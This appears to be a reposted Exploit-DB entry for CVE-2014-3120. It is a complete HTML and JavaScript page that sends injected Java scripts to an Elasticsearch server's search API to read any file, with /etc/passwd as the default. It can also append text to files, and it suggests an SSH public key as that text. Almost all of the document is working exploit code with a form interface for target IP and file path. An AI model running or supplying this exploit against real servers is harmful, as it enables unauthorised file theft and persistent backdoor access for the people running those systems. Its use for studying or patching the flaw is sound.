ElasticSearch – Remote Code Execution

• Exploit Database
• 116 阅读

• 作者： Jeff Geiger
  日期： 2014-05-15
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/33370/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  <!-- ##CVE-2014-3120 Elastic Search Remote Code Execution   This project demonstrates the CVE-2014-3120 vulnerability/misconfiguration.It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them.   ###Notes   This does not require a web server.Save it locally and run it from a browser.   Discovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/ -->   <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- Latest compiled and minified CSS --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css" rel="stylesheet">   <!-- Optional theme --> <link href="http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css" rel="stylesheet"> <style> body { padding-top: 50px; } .starter-template { padding: 40px 15px; text-align: center; }   </style> </head>     <script src="http://code.jquery.com/jquery-1.11.1.min.js"></script> <script> function es_inject() {   var read_file; var write_file;   read_file = function(filename) { return ("import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"" + filename + "\")).useDelimiter(\"\\\\Z\").next();"); };   write_file = function(filename) { return ("import java.util.*;\nimport java.io.*;\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"" + filename + "\", true)));\nwriter.println(\"" + document.getElementById("element_2").value + "\");\nwriter.close();"); };   $(function() { var payload, filename, files, host, _i, _len; files = [document.getElementById("element_3").value]; payload = { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": {} }; if (document.getElementById("element_4").checked) { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": write_file(filename) }; } } else { for (_i = 0, _len = files.length; _i < _len; _i++) { filename = files[_i]; payload["script_fields"][filename] = { "script": read_file(filename) }; } }     $.getJSON("http://" + document.getElementById("element_1").value + ":9200/_search?source=" + (encodeURIComponent(JSON.stringify(payload))) + "&callback=?", function(data) { var content, contents, hit, _j, _len1, _ref, _results; console.log(data); _ref = data["hits"]["hits"]; _results = []; for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) { hit = _ref[_j]; _results.push((function() { var _k, _len2, _ref1; _ref1 = hit["fields"]; for (filename in _ref1) { contents = _ref1[filename]; document.getElementById("script_results").innerHTML += ("<h2>" + filename + "</h2>"); for (_k = 0, _len2 = contents.length; _k < _len2; _k++) { content = contents[_k]; document.getElementById("script_results").innerHTML += (content); } document.getElementById("script_results").innerHTML += ("<hr>"); //document.getElementById("script_results").innerHTML += (document.getElementById("element_4").checked); } })()); } return _results; }); }); }; //es_inject(); </script> <body>   <div class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="https://www.exploit-db.com/exploits/33370/#">Elastic Inject</a> </div>   </div> </div>   <div class="container">   <div class="starter-template"> <h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2> <p class="lead">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p> </div> <div class="col-md-8"> <!-- <form id="ES_Inject" action="" method=""> /--> <label for="element_1">ES_IP_Address: </label><br/> <input id="element_1" name="element_1" class="element text medium" type="text" maxlength="255" value="127.0.0.1"/> <br/> <label for="element_3">File to read/append to: </label><br/> <input id="element_3" name="element_3" class="element text medium" type="text" maxlength="255" value="/etc/passwd"/> <br/> <label class="description" for="element_2">Content to append: </label><br/> <textarea id="element_2" name="element_2" class="element textarea large">YOUR_SSH_PUBLIC_KEY or SOMETHING&lt;/textarea&gt; <br/> <!-- <input id="element_4" type="radio" name="es_action" value="read" checked>READ<br/> /--> <input id="element_4" type="checkbox" name="es_action" value="write">WRITE<br/> <!-- <input id="saveForm" class="button_text" type="submit" name="submit" value="Submit" onClick="es_inject();"/> /--> <button onclick="es_inject();">Click me</button> <!-- </form> /--> <h3>Your file contents should appear below if a read is successful. </h3> <div id="script_results">   </div> </div> <div class="col-md-8"> Original vulnerability discovered by <a href="https://twitter.com/bvdbijl"> @BvdBijl</a>- <a href="http://bouk.co/blog/elasticsearch-rce/">http://bouk.co/blog/elasticsearch-rce/</a> </div> </div><!-- /.container --> <script src="https://netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"></script> </body></html>